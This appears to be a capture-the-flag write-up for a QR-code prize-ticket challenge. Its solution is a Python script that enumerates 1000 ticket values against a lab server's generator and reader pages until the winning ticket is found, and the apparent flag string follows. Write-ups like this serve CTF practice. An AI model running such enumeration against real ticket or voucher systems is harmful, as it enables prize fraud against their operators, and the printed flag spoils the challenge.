DESCRIPTION
This game allows to request a unique ticket that can be scanned and exchanged for different prizes. But the task is to get most precious of them all the FLAG. Try to figure out how to do it.
QUESTION
Do You like winning big prizes? This is one and only chance to get lucky!
SOLUTION
QR code enumeration?
import requests
import urllib.request
from requests_toolbelt.multipart.encoder import MultipartEncoder
for x in range(1000):
print("Trying",x)
urllib.request.urlretrieve("http://10.12.32.131/gen.php?s=qrh&d=" + str(x),"gen.png")
mp_encoder = MultipartEncoder(
fields={
'submit': 'Scan',
# plain file object, no filename or mime type produces a
# Content-Disposition header with just the part name
'fileToUpload': ('gen.png', open('gen.png', 'rb'), 'text/plain'),
}
)
r = requests.post(
'http://10.12.32.131/reader.php',
data=mp_encoder, # The MultipartEncoder is posted as data, don't use files=...!
# The MultipartEncoder provides the content-type header with the boundary:
headers={'Content-Type': mp_encoder.content_type}
)
if not "This time ticket is not valid for main prize, better luck next time." in r.text:
print("Found",x)
input()
Python
b11ec78ecbc456cfe02d02b842c5dc0f